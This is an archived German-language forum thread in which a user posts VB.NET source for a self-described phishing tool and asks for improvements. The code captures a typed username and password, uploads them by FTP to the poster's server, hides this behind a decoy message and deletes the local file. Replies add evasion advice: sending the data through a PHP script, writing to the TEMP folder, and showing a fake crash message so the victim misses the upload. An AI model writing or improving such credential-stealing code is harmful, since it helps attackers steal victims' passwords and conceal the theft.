PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [VB.NET]Phishing Tool (Verbesserungsvorschläge)



NavanBethrax
22.08.2009, 16:00
Hier mal der Code zu meinem Phishing tool ich such ein paar verbesserungsvorschläge ...


Private Sub SpeicherButton_Click() Handles Button1.Click


Dim W As New System.IO.StreamWriter("User.ini", True)
W.WriteLine("Username: " & TextBox1.Text & " & " & "Passwort: " & TextBox2.Text)
W.Close()

My.Computer.Network.UploadFile(My.Application.Info .DirectoryPath & "\User.ini", "ftp://ftp.meinftp.de" & "/" & "User.ini - " & My.Computer.Name.ToString(), "meinftpusername", "meinftppw")

Media.SystemSounds.Asterisk.Play()

MsgBox("Eben irgend ne massage damits nich so schnell auffällt", 64, "Hinweis")

Kill(My.Application.Info.DirectoryPath & "\User.ini")

End Sub
End Class

So mir fallen da selber schon Probleme auf ... Die User.ini is vorm abschicken sichtbar im selben Ordner ich weiß nur nich wie man sie mit dem Atribut Unsichtbar oder im TEMP ordner anlegt ... wusst ich ma mit dem TEMP habbich aba verpeilt ...

Ich glaub Melt (Selbstzerstörung) wäre zu aufällig wenn sich die Exe einfach Löscht ...

100
22.08.2009, 16:13
FTP Upload ist auch dumm, machs über nen Php Script dann kannste dir deine Textdateien sparen..

Ansonsten nimm doch einfach C oder den Programmordner?
Das merkt bis dahin doch niemand..

Selbst löschen ist immer dumm und auffällig.. und bringt nebenbei gar nix.. "Oh das Programm is weg? .. Lad ichs nochmal runter"

inmate
22.08.2009, 16:15
environ("tmp") & "\user.ini"

Sypher
02.09.2009, 17:39
FTP Upload ist auch dumm, machs über nen Php Script dann kannste dir deine Textdateien sparen..

Ansonsten nimm doch einfach C oder den Programmordner?
Das merkt bis dahin doch niemand..

Selbst löschen ist immer dumm und auffällig.. und bringt nebenbei gar nix.. "Oh das Programm is weg? .. Lad ichs nochmal runter"

Falls du das mit dem PHP nicht kapiert hast dann öffne einfach aufeinmal ganz viele Formen und am Ende kommt dann eine Meldung "Softwarefehler, die Anwendung wurde Beendet"

So sieht er nicht den Upload.

Nimm den C:// Ortner oder das Temp Verzeichniss (Google einfach mal).